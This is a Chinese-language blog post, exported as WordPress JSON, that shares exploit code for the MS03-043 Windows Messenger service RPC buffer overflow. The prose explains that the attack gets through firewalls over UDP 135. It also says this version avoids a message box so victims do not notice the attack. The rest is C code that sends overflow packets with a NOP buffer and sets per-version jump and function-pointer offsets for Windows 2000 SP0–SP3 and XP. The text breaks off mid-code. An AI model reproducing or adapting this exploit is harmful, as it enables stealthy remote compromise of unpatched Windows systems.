{"id":861,"date":"2013-08-05T21:37:36","date_gmt":"2013-08-05T13:37:36","guid":{"rendered":"http:\/\/notes.zerobox.org\/?p=861"},"modified":"2013-08-05T21:37:36","modified_gmt":"2013-08-05T13:37:36","slug":"ms03-043%e5%88%a9%e7%94%a8%e4%bb%a3%e7%a0%81","status":"publish","type":"post","link":"http:\/\/zerobox.org\/notes\/861.html","title":{"rendered":"ms03-043\u5229\u7528\u4ee3\u7801"},"content":{"rendered":"

\u56e0\u4e3a\u53ef\u4ee5\u8d70udp135\u548cUDP1024\u4ee5\u4e0a\u4e00\u4e2a\u52a8\u6001\u7aef\u53e3\uff0c\u5f53\u65f6\u5f88\u591a\u641eAPT\u7684\u5f00\u5929\u7f51\u9632\u706b\u5899\u52a0\u9ed1\u51b0\u767d\u540d\u5355\u7684\u673a\u5668\u4e5f\u8f7b\u677e\u80fd\u641e\u5b9a\u3002\u662f\u6211\u5e38\u8bf4\u7684\u91cc\u9762\u90a3\u4e2aMSG\u6f0f\u6d1e\u3002\u610f\u8bc6\u5230RPC\u7684\u91cd\u8981\u6027\u540e\uff0c\u4e00\u7cfb\u5217RPC\u6210\u679c\u3002\u56fd\u5185\u7814\u7a76RPC\u70ed\u57fa\u672c\u4e0a\u662fDCOM\u51fa\u6765\u540e\u3002\u53ef\u60dc\u4e86\u4e00\u4e9b\u5217RPC\u5e93\u7684\u6f0f\u6d1e\uff01<\/p>\n

\u56de\u6765\u627e\u51fa\u4ee3\u7801\u771f\u662f\u591a\u6b21\u4f2a\u9020\u5934\uff0c\u6211\u8bb0\u5f97\u6211\u6709PEB\u6307\u9488\u7248\u672c\u7684\u6ca1\u627e\u7740\uff0c\u8fd9\u4e2a\u4f1a\u5f39\u51fa\u6d88\u606f\u6846\u3002\u627e\u5230\u7684\u662f\u89e3\u51b3\u5f39\u51fa\u6d88\u606f\u6846\u7684\u7248\u672c\uff0c\u4e0d\u4f1a\u8ba9\u4eba\u77e5\u9053\u6709\u653b\u51fb\uff0c\u4f46\u9700\u8981SP\u786e\u8ba4\uff0c\u8986\u76d6\u51fd\u6570\u6307\u9488\uff0c\u548c4\u5b57\u8282\u5c0fshellcod\u8df3\u8f6c\uff0c\u8fd9\u4e2a\u521a\u597d\u8986\u76d6\u4e00\u4e2a\u53d8\u91cf\uff0c\u63a7\u5236\u4e0d\u8ba9\u5f39\u6d88\u606f\u6846\u3002\u8fd8\u6709\u4e00\u4e9b\u957f\u5ea6\u7684\u5904\u7406\u95ee\u9898\uff0c\u4f30\u8ba1\u662f@\u732a\u513f\u866b\u5c0f\u6b21\u90ce \u8bf4\u7684\u8981\u89e3\u51b3\u7684\u957f\u5ea6\u95ee\u9898\u3002<\/p>\n

<\/p>\n

\nvoid sendoverpack()
\n{
\nint i,j;<\/p>\n

for(i=0;i<3;++i)
\n{
\nCreateThread(NULL,0,(LPTHREAD_START_ROUTINE)sendoverstr,0,0,&j);
\nSleep(6000);
\n}
\n\/\/ sendoverpack();
\nif(overok==3)
\n{
\nwhile(1) Sleep(0x7fffffff);
\n}
\n}<\/p>\n

<\/p>\n

void\u00a0 sendoverstr()
\n{
\n\/*
\n* \u8c03\u7528\u8fdc\u7a0b\u8fc7\u7a0b
\n*\/
\nint\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 i,j;
\nRPC_STATUS\u00a0\u00a0\u00a0\u00a0 status;
\nchar buff[0x100];
\n\/\/\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 char buffer[BUFFSIZE];
\nchar\u00a0\u00a0 *buffer=LocalAlloc(LMEM_ZEROINIT,BUFFSIZE+2);
\nchar\u00a0\u00a0 *buffer2=LocalAlloc(LMEM_ZEROINIT,BUFFSIZE+2);<\/p>\n

int\u00a0\u00a0\u00a0 funadd=RVAWIN2K+0x8310;
\nint\u00a0\u00a0\u00a0 jmpshelladd=RVAWIN2K+0x8298;<\/p>\n

\nmemset(buffer,NOPCODE,SENDBUFFLEN);
\nif(sys_ver_num>4||sys_ver_num<0) sys_ver_num=4;<\/p>\n

sys_ver_num=10;<\/p>\n

if(strcmp(version,”sp0″)==0) sys_ver_num=0;
\nif(strcmp(version,”sp1″)==0) sys_ver_num=1;
\nif(strcmp(version,”sp2″)==0) sys_ver_num=2;
\nif(strcmp(version,”sp3″)==0) sys_ver_num=3;<\/p>\n

if(strcmp(version,”winxp”)==0) sys_ver_num=10;
\nif(sys_ver_num==10)
\n{
\nfunadd=RVAWINXP+0x8238;
\njmpshelladd=RVAWINXP+0x8560;
\n}
\nif(sys_ver_num==3)
\n{
\n\/\/win2k+sp3
\nfunadd=RVAWIN2K+0x8078;
\njmpshelladd=RVAWIN2K+0x811c;
\n}
\nif(sys_ver_num==2)
\n{\u00a0\u00a0 \/\/ win2k+sp2
\nfunadd=RVAWIN2K+0x8330;
\njmpshelladd=RVAWIN2K+0x82b8;
\n}
\nif(sys_ver_num==1)
\n{\u00a0\u00a0 \/\/ win2k+sp1
\nfunadd=RVAWIN2K+0x8330;
\njmpshelladd=RVAWIN2K+0x82b8;
\n}
\nif(sys_ver_num==0)
\n{\u00a0\u00a0 \/\/ win2k+sp0<\/p>\n